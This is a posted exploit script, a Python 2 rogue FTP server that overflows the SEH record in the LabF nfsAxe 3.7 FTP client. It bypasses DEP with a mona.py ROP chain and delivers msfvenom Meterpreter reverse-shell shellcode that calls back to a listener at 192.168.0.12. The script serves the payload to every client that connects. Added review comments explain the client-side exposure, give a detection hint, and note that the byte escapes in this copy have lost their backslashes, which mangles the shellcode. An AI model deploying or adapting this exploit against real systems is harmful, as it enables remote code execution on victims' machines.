LabF nfsAxe FTP Client 3.7 Buffer Overflow
Posted on 09 December 2017
#!/usr/bin/env python
#
# Exploit Title   : LabF nfsAxe 3.7 FTP Client (DEP Bypass)
# Date            : 12/8/2017
# Exploit Author  : wetw0rk
# Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html
# Software link   : http://www.labf.com/download/nfsaxe.exe
# Version         : 3.7
# Tested on       : Windows 7 (x86)
# Description     : Upon connection the victim is sent a specially crafted buffer
#                   overwriting the SEH record, resulting in code execution.
#
# Greetz: abatchy17, mvrk, and Dillage (Dilly Dilly)
#
# Trigger the vulnerability by :
#      Login as -> [check] anonymous -> connect
#
# NOTE(review): this is a *client-side* bug. The script below is a rogue FTP
# server; the overflow happens inside the nfsAxe FTP client when it parses the
# oversized "220 ... is current directory" reply built further down. The
# exposed party is therefore anyone who points the vulnerable client at an
# untrusted server, and the defensive answer is to not connect 3.7 to servers
# you do not control (or to retire it) rather than anything on the server side.
#
# NOTE(review): the script is Python 2 only. `print("...") % (a, b)` relies on
# `print` being a statement (the parentheses only group the string before `%`);
# under Python 3 it raises TypeError after printing. The `''.join(struct.pack(..))`
# and `conn.send('...')` calls likewise assume str == bytes.
#
# NOTE(review): the byte-string escapes in this copy have lost their backslashes
# (e.g. `x2b` is literally three characters). They are left byte-identical here;
# the length arithmetic below describes the author's intended layout, not this
# extracted text.

import struct, socket

# Bind address/port for the rogue server. 21 needs elevated privileges on most
# systems; 0.0.0.0 listens on every interface.
host = "0.0.0.0"
port = 21

# msfvenom LHOST=192.168.0.12 LPORT=34 -p windows/meterpreter/reverse_tcp
# -f python -b "x00x0ax10" -v shellcode --smallest
#
# Generated reverse-shell payload, encoded to avoid the listed bad characters
# (the -b list is mangled by the same missing backslashes as the bytes below).
shellcode  = ""
shellcode += "x2bxc9x66xb9x18x01xe8xffxffxffxffxc1"
shellcode += "x5ex30x4cx0ex07xe2xfaxfdxeax81x04x05"
shellcode += "x06x67x81xecx3bxcbx68x86x5ex3fx9bx43"
shellcode += "x1ex98x46x01x9dx65x30x16xadx51x3ax2c"
shellcode += "xe1xb3x1cx40x5ex21x08x05xe7xe8x25x28"
shellcode += "xedxc9xdex7fx79xa4x62x21xb9x79x08xbe"
shellcode += "x7ax26x40xdax72x3axedx6cxb5x66x60x40"
shellcode += "x91xc8x0dx5dxa5x7dx01xc2x7exc0x4dx9b"
shellcode += "x7fxb0xfcx90x9dx5ex55x92x6exb7x2dxaf"
shellcode += "x59x26xa4x66x23x7bx15x85x3axe8x3cx41"
shellcode += "x67xb4x0exe2x66x20xe7x35x72x6exa3xfa"
shellcode += "x76xf8x75xa5xffx33x5cx5dx21x20x1dx24"
shellcode += "x24x2ex7fx61xddxdcxdex0ex94x6cx05xd4"
shellcode += "xe2xb8xbex8dx8exe7xe7xe2xa0xccxc0xfd"
shellcode += "xdaxe0xbex9ex65x4ex24x0dx9fx9fxa0x88"
shellcode += "x66xf7xf4xcdx8fx27xc3xa9x55x7exc6xa7"
shellcode += "xc6x6fx18xb1xbexdbxb6xb5xb6x95x31x5f"
shellcode += "xeaxebxecxedxfexefx80x91xaax29xcbx1a"
shellcode += "x26x38x1dx5exa0xdbx9ax9axa6x56x75xa5"
shellcode += "xb3x2cx01x50x16xa3xd4x26x94xd3xa9x31"
shellcode += "xb6x2fx55x43xb4x1cx31x8fxe6x8dxecxbf"
shellcode += "xbdx83xeex34x26xb0x0fx24x79xc5x9exb5"
shellcode += "x9exf7xe8xf9xfaxadx96xfdx96xa7xa4x52"
shellcode += "xe7xfcxd1x96x55x6dx08x5fx59x5cx64x0f"
shellcode += "xd7xc7x4fxeexc7x12xd7x3cxd0x62xf6xda"


def create_rop_chain():
    """Pack the mona.py-generated gadget list into a little-endian byte string.

    Per the per-gadget comments (mona.py's, kept verbatim), the chain derives
    the VirtualProtect() arguments by negating two constants (0x201 -> dwSize,
    0x40 -> flNewProtect) and then PUSHADs into the call, i.e. it is the
    standard DEP bypass that re-marks the stack as executable. Every address is
    hard-coded against msvcr71.dll, so the chain presumably only works where
    that module loads at the same base as on the author's test machine — the
    absence of ASLR/rebasing for that module is the enabling weakness, together
    with the lack of SafeSEH on the module whose handler address is used below.

    Returns:
        str (Python 2): the packed chain, one '<I' (4-byte LE) word per gadget.
    """
    # https://www.corelan.be/index.php/security/corelan-ropdb/
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
        0xfffffdff,  # Value to negate, will become 0x00000201 (dwSize)
        0x7c347f98,  # RETN (ROP NOP) [msvcr71.dll]
        0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
        0xffffffff,  #
        0x7c376402,  # skip 4 bytes [msvcr71.dll]
        0x7c351e05,  # NEG EAX # RETN [msvcr71.dll]
        0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]
        0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
        0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
        0x7c34d201,  # POP ECX # RETN [msvcr71.dll]
        0x7c38b001,  # &Writable location [msvcr71.dll]
        0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
        0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
        0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
        0x7c345c30,  # ptr to 'push esp # ret ' [msvcr71.dll]
    ]
    # `_` is used as an ordinary loop variable here, not as a throwaway.
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)


# ROP chain, then a NOP sled (escapes mangled in this copy), then the payload.
rop_chain  = create_rop_chain()
rop_chain += "x90" * 20
rop_chain += shellcode

# Buffer layout (author's intended sizes, which make `buffer` exactly 10000 bytes):
#   off2ROP (212) + rop_chain + off2nSEH  = 9391 bytes up to the SEH record
#   + nSEH (4) + SEH (4)                  = 9399
#   + trigger (10000 - 9399 = 601)        = 10000
off2ROP  = "B" * 212                    # offset to the start of our ROP chain
off2nSEH = "A" * (9391- (               # offset the nSEH and adjustments
                len(off2ROP) + len(rop_chain)   # account for shellcode and offset
            )
        )
nSEH = "BBBB"                           # SEH will be the start of the stack pivot
# Overwritten handler address: a stack pivot (ADD ESP,61C + pops + RETN) in
# WCMDPA10.dll that lands execution on the ROP chain placed earlier in the buffer.
SEH  = struct.pack('<L', 0x68034468)    # ADD ESP,61C # POP # POP # POP # POP # POP # RETN [WCMDPA10.dll]
trigger = "C" * (10000 - (              # fill buffer to trigger vulnerability
                9399                    # offset + nSEH + SEH
            )
        )

buffer = off2ROP + rop_chain + off2nSEH + nSEH + SEH + trigger
# The overflow is carried in the 220 reply to a directory query. From a
# detection standpoint: a 220 response around 10 KB, dominated by runs of
# 'A'/'B'/'C', is far outside anything a real FTP server emits.
payload = "220 %s is current directory " % (buffer)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind((host, port))
    sock.listen(20)
    print("[*] server listening on %s:%d") % (host, port)
# NOTE(review): bare `except:` also catches KeyboardInterrupt/SystemExit and
# hides the real bind error (port in use vs. permission denied); catching
# socket.error and printing it would be the minimum.
except:
    print("[-] failed to bind the server exiting...")
    exit()

# Accept loop: every client that connects is walked through a fake login
# (banner, 331, 230) and then handed the oversized reply. The client's own
# commands are read and discarded (`conn.recv(1024)` results are ignored), so
# nothing about the peer is verified. Connections are never closed and
# `send()` may write only part of a 10 KB payload (`sendall` would not);
# neither is handled.
while True:
    conn, addr = sock.accept()
    print("[*] connection from %s:%d") % (addr[0], addr[1])
    print("[+] sending %d bytes to target host" % (len(buffer)))
    # Banner impersonates a different product; it plays no part in the overflow.
    conn.send('220 Welcome Serv-U FTP Server v6.0 for WinSock ready... ')
    conn.recv(1024)
    conn.send('331 OK ')
    conn.recv(1024)
    conn.send('230 OK ')
    conn.recv(1024)
    conn.send(payload)